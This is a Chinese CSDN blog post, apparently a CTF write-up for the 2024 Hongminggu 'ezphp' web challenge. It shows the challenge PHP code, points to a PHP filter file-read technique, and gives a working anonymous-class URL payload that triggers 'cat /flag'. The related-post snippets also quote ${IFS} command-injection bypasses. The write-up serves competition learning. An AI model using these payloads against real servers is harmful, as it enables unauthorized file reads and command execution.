红明谷2024（Web方向）

Zue3r

已于 2024-05-15 15:15:33 修改

阅读量214

点赞数 3

分类专栏： CTF 文章标签： php web安全网络安全

于 2024-05-15 15:07:48 首次发布

本文链接：https://blog.csdn.net/qq_46548764/article/details/138909060

版权

CTF 专栏收录该内容

8 篇文章 1 订阅

订阅专栏

文章目录

1. ezphp

1. ezphp

<?php
highlight_file(__FILE__);
// flag.php
if (isset($_POST['f'])) {
    echo hash_file('md5', $_POST['f']);
}
?>

涉及PHP filter文件读取攻击，参考：https://xz.aliyun.com/t/12939，读取flag.php文件。
在这里插入图片描述
flag.php文件内容如下：

<?php
if (isset($_GET['ezphpPhp8'])) {
    highlight_file(__FILE__);
} else {
    die("No");
}
$a = new class {
    function __construct()
    {
    }

    function getflag()
    {
        system('cat /flag');
    }
};
unset($a);
$a = $_GET['ezphpPhp8'];
$f = new $a();
$f->getflag();
?>

涉及匿名类的调用，payload如下：

/flag.php?ezphpPhp8=class%40anonymous%00%2Fvar%2Fwww%2Fhtml%2Fflag.php%3A7%241

在这里插入图片描述

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Zue3r

关注关注

3
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
红明谷2024（Web方向）

红明谷2024（Web方向）
复制链接

扫一扫

专栏目录

2024红明谷杯部分WP_netpixeljihad(1)

2401_83974064的博客

04-11

813

考虑一下使用后台设置栏目存在任意文件读取漏洞看看能不能读取flag点击左侧栏中的“栏目/文章”选项进入到栏目管理，新建顶级栏目，创建一个命名为测试的顶级栏目。点击保存，访问前台，重新访问对应的顶级栏目，得到flag。

2023红明谷杯部分WP_netpixeljihad，网络安全高频面试题+解析

2401_84006732的博客

04-03

682

解密结果：api.phpdatafavcon.icoindex.phprobots.txtsecret.txtthemexhpxxx1.phpflag经过DNS Cipher处理：https://github.com/karma9874/DNA-Cipher-Script-CTF替换几位会发现flag格式是uuid形式的，按照以下这个规则替换即可‘AAA’:‘a’‘AAC’:‘b’‘AAG’:‘c’‘AAT’:‘d’‘ACA’:‘e’

参与评论您还未登录，请先登录后发表或查看评论

【Web】2024红明谷CTF初赛个人wp(2/4)

uuzeray的博客

04-03

1347

时间原因只打了2个小时，出了2道，简单记录一下。

【2024红明谷】三道Web题目的记录

jayq1的博客

04-03

1068

三道Web题目的记录与分享，希望对师傅们有所帮助，有理解不当之处也希望师傅们及时指正，感恩！

2024红明谷杯——Misc 加密的流量

Amherstieae的博客

04-19

486

这里是贝塔贝塔，照例来一段闲聊打比赛但赛前一波三折，又是成功签到的一个比赛说起来比赛全名叫红明谷卫星应用数据安全场景赛，但好像真的跟卫星的关系不大，没有bin方向的赛题，只有crypto、misc和web，我不好评价，我不好说.wav给大家推荐知我，真的很好听！【进入正文】

2023红明谷杯部分WP_netpixeljihad(1)，腾讯T4架构师

2401_83740129的博客

04-17

360

去除重复的，总共有八段数据，一开始测试的时候发现除了第一条和第四条能成功解密，其他都是乱码，经过摸索才发现每条需要按照[0:] [1:] [2:] [4:]截断，其中[1:]的还得去掉最后一位，才能正确解密，而且解密出来的明文在开头还会丢失一两位字符。网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。有了加密逻辑以及密码，就可以解密数据了，外带的数据也被wireshark截获了。点击保存，访问前台，重新访问对应的顶级栏目，得到flag。

[HMGCTF2022]wp

Huamang的博客

03-24

4136

WEB Fan website 首先是一个www.zip的源码泄露，是laminas框架 mvc的框架首先就是看路由在\module\Album\src\Controller\AlbumController.php里面有功能点 <?php namespace Album\Controller; use Album\Model\AlbumTable; use Laminas\Mvc\Controller\AbstractActionController; use Laminas\View\Mode

2023红明谷杯部分WP_netpixeljihad，网络安全社招面试题

碧海朝天素

04-05

372

点击左侧栏中的“栏目/文章”选项进入到栏目管理，新建顶级栏目，创建一个命名为测试的顶级栏目。点击保存，访问前台，重新访问对应的顶级栏目，得到flag。

大数据-算法-朝鲜数学的儒学化倾向.pdf

04-18

作者崔锡鼎，字明谷，号锡鼎，是李朝肃宗时期的大臣，著有《经世正韵图说》和《明谷集》，并编纂了《左氏辑选》。这一部分还简要介绍了崔锡鼎所处时代的党派冲突，并参考了《李朝实录》中关于他的相关记载。第二...

LNMP环境搭建论坛

qq_63652578的博客

08-07

974

root@Rocky8-node1 ~]# mv upload/* /usr/share/nginx/html/ #把upload下的所有内容移动到/usr/share/nginx/html/[root@Rocky8-node1 ~]# sed -i '/^group =/ c \group = nginx' /etc/php-fpm.d/www.conf #将组改为nginx。

[FSCTF 2023]细狗2.0

2301_81462177的博客

08-09

220

cmd=ls${lFS}-1剁FSS9-后面加个$与{类似，起截断作用，$9是当前系统shel进程第九个参数持有者始终为空字符串。cmd=lsSlFS-l单纯$IFS2,IFS2被bash解释器当做变量名，输不出来结果，加一个{}就固定了变量名。ca\t/*123*/f* 发现不可以，看题解后发现使用${IFS}绕过。cmd=ls$lFs$9-1 (这里1到9应该都可以)ca\t$IFS/f* 可得flag。尝试输入cat /f*

Linux安全与高级应用（四）深入探索MySQL数据库：安装、管理与安全实践

洛秋的博客

08-07

1367

Linux：作为操作系统，提供稳定的运行环境。Apache：作为Web服务器，处理HTTP请求。MySQL：作为数据库管理系统，存储和管理数据。：作为脚本语言，生成动态网页。LAMP平台的优势在于其成本低廉、可定制性强、易于开发、方便易用且安全稳定。这使得LAMP成为许多企业和开发者的首选平台。通过以上步骤，我们完成了LAMP平台的部署及其主要组件的配置和测试。LAMP平台的搭建不仅为Web开发提供了一个强大的环境，同时也展现了其在成本和效率上的优势。

ctfhub文件包含

a666666688的博客

08-07

483

文件的内容，通常这个文件包含一些敏感信息，比如CTF比赛中的flag。这样就可以通过浏览器或其他HTTP客户端看到。，直接访问这个URL将导致服务器读取并返回。

代码随想录算法训练营Day35 | 01背包问题 | 416. 分割等和子集